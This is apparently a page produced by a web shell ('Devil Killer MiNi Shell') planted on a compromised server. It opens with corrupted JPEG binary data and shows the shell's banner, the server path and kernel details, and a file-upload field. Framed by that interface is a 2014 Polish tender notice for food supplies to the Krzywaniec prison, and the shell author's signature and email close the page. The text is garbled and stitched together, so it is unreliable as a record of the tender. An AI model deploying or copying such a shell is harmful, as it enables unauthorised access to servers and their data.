JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140129/32720-N-2014.html

<p class="kh_header"><b>Nowogród Bobrzański: Nr spr. 3/DKW/ż/14 DOSTAWA RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH DLA ZAKŁADU KARNEGO W KRZYWAŃCU</b><br>
<b>Numer ogłoszenia: 32720 - 2014; data zamieszczenia: 29.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Krzywańcu , Krzywaniec, 66-010 Nowogród Bobrzański, woj. lubuskie, tel. 68 3279405, faks 68 3276640.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr spr. 3/DKW/ż/14 DOSTAWA RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH DLA ZAKŁADU KARNEGO W KRZYWAŃCU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa różnych artykułów spożywczych dla Zakładu Karnego w Krzywańcu w n/w ilościach:
ZADANIE NR 1 - PRODUKTY PRZEMIAŁU ZIARNA: makaron 8000 kg, granulat sojowy 200 kg, kostka sojowa 700 kg, kotlet sojowy a la schabowy 700 kg, mąka pszenna 3500 kg, mąka ziemniaczana 200 kg, kasza gryczana 2000 kg, kasza jęczmienna 4000 kg, ryż 4000 kg, kasza manna 1000 kg. 
ZADANIE NR 2 - PRZETWORY OWOCOWO - WARZYWNE: chrzan tarty 300 kg, koncentrat pomidorowy 1200 kg, leczo 2500 kg, ogórki konserwowe 4000 kg, sok przecierowy 300 szt., kukurydza konserwowa 40 kg, groszek konserwowy 40 kg, brzoskwinie w syropie 50 szt.
ZADANIE NR 3 - DŻEMY: dżem brzoskwiniowy niskosłodzony 1500 kg, dżem truskawkowy niskosłodzony 3000 kg, marmolada wieloowocowa 3500 kg, konfitura z truskawek 10 kg, konfitura z brzoskwiń 10 kg, konfitura z wiśni 20 kg, powidła śliwkowe 10 kg. 
ZADANIE NR 4 - SOSY, ZUPY I PRZYPRAWY: zupa porowa 160 kg, zupa ziemniaczana 160 kg, zupa żurek 160 kg, zupa barszcz biały 160 kg, zupa barszcz czerwony 160 kg, zupa cebulowa 160 kg, zupa kalafiorowa 160 kg, zupa ogonowa 160 kg, zupa pieczarkowa 160 kg, zupa pomidorowa 160 kg, zupa wiosenna 160 kg, zupa gulaszowa 160 kg, zupa grochowa 160 kg, zupa jarzynowa 160 kg, sos biały 140 kg, sos pieczeniowy 200 kg, sos myśliwski 200 kg, sos grzybowy 160 kg, sos pomidorowy 160 kg, sos boloński 200 kg, sos neapolitański 100 kg, czosnek granulowany 25 kg, fix do gulaszu 100 kg, ziele angielskie 20 kg, liść laurowy 20 kg, majeranek 30 kg, papryka słodka mielona 50 kg, papryka ostra mielona 50 kg, pieprz czarny mielony 80 kg, sól 1800 kg, bazylia 15 kg, oregano 15 kg, koper suszony 30 kg, natka pietruszki suszona 30 kg, bulion drobiowy 1800 kg, przyprawa warzywna typu vegetta 300 kg, kwasek cytrynowy 20 kg, przyprawa w płynie typu maggi 1200 l, ocet 200 l.
ZADANIE NR 5 - INNE ARTYKUŁY SPOŻYWCZE: herbata 800 kg, majonez 200 kg, musztarda 300 kg, budyń 30 kg, galaretka 30 kg, kisiel 30 kg, proszek do pieczenia 50 szt., krem czekoladowy 20 kg, cukier waniliowy 30 szt., kakao rozpuszczalne 20 kg, paluszki słone 300 szt., wafelki 30 kg, ptasie mleczko 20 kg, cukierki czekoladowy 20 kg, biszkopty 30 kg, lizak 300 szt., kaszka ryżowa błyskawiczna 30 kg, kaszka mleczno - ryżowa 30 kg, ciastka maślane 20 kg, herbata owocowa 30 kg, płatki kukurydziane  50 kg, płatki kukurydziane w polewie czekoladowej 50 kg, syrop owocowy 50 l, bita śmietana 50 szt., sok 100 l, czekolada mleczna 10 kg, wafle ryżowe 20 kg, chrupki kukurydziane 350 szt., cukier 15000 kg, woda źródlana 3000 szt., kawa zbożowa 500 kg..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.85.11.00-9, 15.80.00.00-6, 15.61.21.00-2, 15.60.00.00-4, 15.61.00.00-7, 15.61.10.00-4, 15.33.10.00-7, 15.33.15.00-2, 15.33.14.25-2, 15.33.22.96-5, 15.33.22.00-6, 15.33.22.90-3, 15.89.14.00-4, 15.87.00.00-7, 15.86.30.00-5, 15.80.00.00-6, 15.84.10.00-5, 15.61.33.11-1, 15.86.12.00-3, 15.98.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawa szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawa szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawa szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawa szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawa szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz ofertowy wraz z zawartymi oświadczeniami - załącznik nr 1 do SIWZ;
b) dokumenty potwierdzające uprawnienie osób podpisujących ofertę (np. oryginał pełnomocnictwa lub kopia notarialnie poświadczona), o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W przypadku ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy, strony dopuszczają możliwość zmiany stawek podatkowych określonych w umowie zgodnie z obowiązującymi przepisami.
2.	Strony przewidują możliwość zmiany umowy w przypadku zmiany przepisów prawnych dotyczących bezpieczeństwa żywności i żywienia.
3.	Każda zmiana postanowień niniejszej umowy wymaga pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Krzywańcu, 66-010 Nowogród Bobrzański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 12:30, miejsce: Zakład Karny w Krzywańcu, 66-010 Nowogród Bobrzański (BIURO PODAWCZE).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PRODUKTY PRZEMIAŁU ZIARNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów przemiału ziarna  dla Zakładu Karnego w Krzywańcu w n/w ilościach: makaron 8000 kg, granulat sojowy 200 kg, kostka sojowa 700 kg, kotlet sojowy a la schabowy 700 kg, mąka pszenna 3500 kg, mąka ziemniaczana 200 kg, kasza gryczana 2000 kg, kasza jęczmienna 4000 kg, ryż 4000 kg, kasza manna 1000 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9, 15.80.00.00-6, 15.61.21.00-2, 15.60.00.00-4, 15.61.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRZETWORY OWOCOWO - WARZYWNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa przetworów owocowo - warzywnych dla Zakładu Karnego w Krzywańcu w n/w ilościach: chrzan tarty 300 kg, koncentrat pomidorowy 1200 kg, leczo 2500 kg, ogórki konserwowe 4000 kg, sok przecierowy 300 szt., kukurydza konserwowa 40 kg, groszek konserwowy 40 kg, brzoskwinie w syropie 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.15.00-2, 15.33.10.00-7, 15.33.14.25-2, 15.98.21.00-6, 15.33.14.00-1, 15.33.24.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DŻEMY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dżemów dla Zakładu Karnego w Krzywańcu w n/w ilościach: dżem brzoskwiniowy niskosłodzony 1500 kg, dżem truskawkowy niskosłodzony 3000 kg, marmolada wieloowocowa 3500 kg, konfitura z truskawek 10 kg, konfitura z brzoskwiń 10 kg, konfitura z wiśni 20 kg, powidła śliwkowe 10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.30-5, 15.33.22.96-5, 15.33.22.90-3, 15.33.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SOSY, ZUPY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przdmiotem zamówienia jest dostawa sosów, zup i przypraw dla Zakładu Karnego w Krzywańcu w n/w ilościach: zupa porowa 160 kg, zupa ziemniaczana 160 kg, zupa żurek 160 kg, zupa barszcz biały 160 kg, zupa barszcz czerwony 160 kg, zupa cebulowa 160 kg, zupa kalafiorowa 160 kg, zupa ogonowa 160 kg, zupa pieczarkowa 160 kg, zupa pomidorowa 160 kg, zupa wiosenna 160 kg, zupa gulaszowa 160 kg, zupa grochowa 160 kg, zupa jarzynowa 160 kg, sos biały 140 kg, sos pieczeniowy 200 kg, sos myśliwski 200 kg, sos grzybowy 160 kg, sos pomidorowy 160 kg, sos boloński 200 kg, sos neapolitański 100 kg, czosnek granulowany 25 kg, fix do gulaszu 100 kg, ziele angielskie 20 kg, liść laurowy 20 kg, majeranek 30 kg, papryka słodka mielona 50 kg, papryka ostra mielona 50 kg, pieprz czarny mielony 80 kg, sól 1800 kg, bazylia 15 kg, oregano 15 kg, koper suszony 30 kg, natka pietruszki suszona 30 kg, bulion drobiowy 1800 kg, przyprawa warzywna typu vegetta 300 kg, kwasek cytrynowy 20 kg, przyprawa w płynie typu maggi 1200 l, ocet 200 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.00-4, 15.87.00.00-7, 15.87.21.00-2, 15.87.24.00-5, 15.89.14.00-4, 15.87.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> INNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa innych artykułów spożywczych dla Zakładu Karnego w Krzywańcu w n/w ilościach: herbata 800 kg, majonez 200 kg, musztarda 300 kg, budyń 30 kg, galaretka 30 kg, kisiel 30 kg, proszek do pieczenia 50 szt., krem czekoladowy 20 kg, cukier waniliowy 30 szt., kakao rozpuszczalne 20 kg, paluszki słone 300 szt., wafelki 30 kg, ptasie mleczko 20 kg, cukierki czekoladowe 20 kg, biszkopty 30 kg, lizak 300 szt., kaszka ryżowa błyskawiczna 30 kg, kaszka mleczno - ryżowa 30 kg, ciastka maślane 20 kg, Herbata owocowa 30 kg, płatki kukurydziane 50 kg, płatki kukurydziane w polewie czekoladowej 50 kg, syrop owocowy 50 l, bita śmietana 50 szt., sok 100 l, czekolada mleczna 10 kg, wafle ryżowe 20 kg, chrupki kukurydziane 350 szt., cukier 15000 kg, woda źródlana 3000 szt., kawa zbożowa 500 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.86.30.00-5, 15.87.12.73-8, 15.87.12.50-1, 15.83.31.00-7, 15.80.00.00-6, 15.84.20.00-2, 15.84.10.00-5, 15.84.23.00-5, 15.84.22.20-0, 15.86.41.00-3, 15.61.33.11-1, 15.32.18.00-2, 15.32.10.00-4, 15.83.10.00-2, 15.98.13.00-8, 15.86.12.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com